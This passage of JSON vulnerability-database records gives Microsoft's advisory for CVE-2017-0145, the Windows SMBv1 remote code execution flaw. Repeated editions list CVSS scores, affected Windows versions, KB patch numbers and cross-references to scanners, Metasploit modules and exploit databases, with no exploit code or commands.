"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4014077", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4014077", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", 